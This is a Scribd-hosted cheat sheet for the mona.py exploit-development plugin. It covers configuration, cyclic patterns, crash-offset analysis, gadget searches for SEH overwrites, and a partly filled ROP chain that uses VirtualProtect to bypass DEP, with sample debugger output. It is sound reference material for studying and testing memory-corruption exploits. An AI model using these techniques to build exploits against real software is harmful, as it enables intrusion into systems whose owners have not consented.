[go: up one dir, main page]
Scribd
Upload
188 views5 pages

Mona.py Exploit Cheatsheet

This document provides a cheat sheet for using the Mona.py tool to analyze crashes and facilitate exploit development. It outlines commands for configuring Mona, searching for pointers and patterns in memory, finding code snippets, generating cyclic patterns, and automating ROP chain generation for bypassing DEP. The document explains how to use Mona to suggest exploit primitives after a crash, find useful gadgets like POP/POP/RET sequences, and provide starting points for ROP payloads.

Uploaded by

JulioIglesias
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
188 views5 pages

Mona.py Exploit Cheatsheet

This document provides a cheat sheet for using the Mona.py tool to analyze crashes and facilitate exploit development. It outlines commands for configuring Mona, searching for pointers and patterns in memory, finding code snippets, generating cyclic patterns, and automating ROP chain generation for bypassing DEP. The document explains how to use Mona to suggest exploit primitives after a crash, find useful gadgets like POP/POP/RET sequences, and provide starting points for ROP payloads.

Uploaded by

JulioIglesias
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

===========================

A LITTLE MONA.PY CHEATSHEET


===========================

Last Modify: 08/12/2011


Author: luca.mella@studio.unibo.it

************************************************************************
*** Configuration ******************************************************
************************************************************************

!mona config -set workingfolder c:\logs\%p


Set the current working directory. Mona will put output here.
You might use -get alse for retrive current working folder.
(%p means processname)

-cm <option>=true/false
safeseh
aslr
os
rebase

************************************************************************
*** General searching options ******************************************
************************************************************************

-cp <option>,<option>
nonull
unicode 00xx00yy
ascii
asciiprint
upper
lower
uppernum
lowernum
numeric
alphanum
startswithnull 00xxyyzz

-cpb <badchars>
Exclude specified badchars from pointer search

-p <N>
Number of pointers to return

-x <level>
R,W,X,RW,RX,WX,RWX,* pointers that point to a segment with specified
access level

************************************************************************
*** Pattern ************************************************************
************************************************************************

!mona pc <size>
Create a cyclic pattern of <size> bytes. Same of "msf_pattern" in metasploit

!mona po <0x4bytes>
find the offset of specified bytes in cyclic pattern
************************************************************************
*** After a crash with cyclic pattern payload **************************
************************************************************************

!mona suggest

Watch for output..


EIP overwritten with normal pattern : 0x37694136 (offset 260)
!!! %EBP+4
ESP (0x0018f574) points at offset 264 in normal pattern (length 736)
EBP overwritten with normal pattern : 0x69413569 (offset 256)
EBX (0x0018f580) points at offset 276 in normal pattern (length 724)

--- output ---


0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D [+] Looking for cyclic pattern in memory
750F0000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x0018f46c (length 1000
bytes)
0BADF00D Cyclic pattern (normal) found at 0x001c3961 (length 1000
bytes)
0BADF00D [+] Examining registers
0BADF00D EIP overwritten with normal pattern : 0x37694136 (offset 260)
0BADF00D ESP (0x0018f574) points at offset 264 in normal pattern
(length 736)
0BADF00D EBP overwritten with normal pattern : 0x69413569 (offset 256)
0BADF00D EBX (0x0018f580) points at offset 276 in normal pattern
(length 724)
0BADF00D [+] Examining SEH chain
0BADF00D [+] Examining stack
0BADF00D Pointer into normal cyclic pattern at ESP-0x1e8 (-488) :
0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x19c (-412) :
0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x174 (-372) :
0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x170 (-368) :
0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x164 (-356) :
0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x154 (-340) :
0x0018f56c : offset 256, length 744
0BADF00D Pointer into normal cyclic pattern at ESP-0x134 (-308) :
0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x114 (-276) :
0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x110 (-272) :
0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x10c (-268) :
0x0018f580 : offset 276, length 724
0BADF00D [+] Preparing log file 'exploit.rb'
0BADF00D - (Re)setting logfile C:\mona_logs\exploit.rb
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
--- end of output ---
************************************************************************
*** Finding things in memory *******************************************
************************************************************************

!mona find

Find a sequence of bytes in memory.


Mandatory argument : -s <pattern> : the sequence to search for.
-type <type> : Type of pattern to search for : bin,asc,ptr,instr,file
-b <address> : the bottom of the search range
-t <address> : the top of the search range
-c : skip consecutive pointers but show length of the pattern instead
-p2p : show pointers to pointers to the pattern (might take a while !)
-r <number> : if p2p is used, you can tell the find to also find close
pointers by specifying -r with a value.
This value indicates the number of bytes to step
backwards for each search

!mona find -type instr -s "jmp ebx" -m ntdll.dll

--- output ---


Search into module ntdll.dll
Search for "jmp ebx" as assembly instruction
Result:
0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll]
ASLR: True, Rebase: True,
SafeSEH: True, OS: True,
v6.1.7600.16385 (C:\Windows\SysWOW64\ntdll.dll)
--- end of output ---

************************************************************************
*** Assemble instructions **********************************************
************************************************************************

!mona assemble -s "nop"

Return the opcode of specified instructions (chain with '#').

************************************************************************
*** Searching for 'POP/POP/RET' instruction (SEH exploiting) ***********
************************************************************************
!mona seh

Find POP POP RET instruction into program memory.


This statements could be used in SEH exploiting.

--- output ---


0BADF00D [+] Writing results to C:\mona_logs\seh.txt
0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret ' : 3
0BADF00D - Number of pointers of type 'pop esi # pop edi # ret ' : 3
0BADF00D - Number of pointers of type 'pop ecx # pop ebx # ret ' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret ' : 3
0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret 04' : 2
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret ' : 15
0BADF00D - Number of pointers of type 'pop ecx # pop edi # ret ' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 0c' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret ' : 6
0BADF00D - Number of pointers of type 'jmp dword ptr ss:[esp+14]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 08' : 2
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-04]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 04' : 2
0BADF00D - Number of pointers of type 'call dword ptr ss:[esp+14]' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 04' : 14
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1
0BADF00D - Number of pointers of type 'pop edi # pop ebx # ret ' : 1
[..]
--- end of output ---

************************************************************************
*** ROP based exploit *******************************
************************************************************************

!mona rop -m <NONASLRMODULES>

Analyze memory prepare several lists of ROP valid gadget (any INSTR + RET
sequence), stack pivots, rop functions,
Generate a ROP chain aimed to bypass DEP (call to VirtualProtect with PUSHAD
technique), and suggest wich address
need to be fixed for make it works.

NOTE:
Watch "C:\mona_logs\rop_suggestion.txt" for a clear gadget list.
Watch "C:\mona_logs\rop_virtualprotect.txt" for a starting point for
your rop payload (aimed to DEP bypass).
Watch "C:\mona_logs\stack_pivot.txt" for a list of gadget that permit
to change ESP.

--- output ---


---------- Mona command started on 2011-07-21 10:58:09 ----------
[..]
VirtualProtect register structure (PUSHAD technique)
----------------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (Writable ptr)
EDX = NewProtect (0x40)
EBX = Size
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp - run '!mona jmp -r esp -
n -o')
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)

VirtualProtect() 'pushad' rop chain


------------------------------------
rop_gadgets =
[
0x00404880, # POP ECX # RETN (server.exe)
0x????????, # <- *&VirtualProtect()
0x00406a48, # MOV EAX,DWORD PTR DS:[ECX]
# ADD EAX,ECX # RETN (server.exe)
0x????????, # ** <- find routine to move
virtualprotect() into esi
# ** Hint : look for
mov [esp+offset],eax and pop esi
0x????????, # couldn't find a pointer to
put ptr to 'jmp esp' into ebp
0x????????, # <- put pointer to payload
here
0x00403e04, # POP EBX # RETN (server.exe)
0x00000201, # <- change size to mark as
executable if needed (-> ebx)
0x00404880, # POP ECX # RETN (server.exe)
0x00409000, # RW pointer (lpOldProtect)
(-> ecx)
0x00404be4, # POP EDI # RETN (server.exe)
0x00404be5, # ROP NOP (-> edi)
0x0040431c, # POP EDX # RETN (server.exe)
0x00000040, # newProtect (0x40) (-> edx)
0x00404a84, # POP EAX # RETN (server.exe)
0x90909090, # NOPS (-> eax)
0x004022e0, # PUSHAD # RETN (server.exe)
# rop chain generated by mona.py
# note : this chain may not work out of the box
# you may have to change order or fix some
gadgets,
# but it should give you a head start
].pack("V*")
[..]
--- end of output ---

===================================================================================
===
Reference:
https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-
breakfast/

You might also like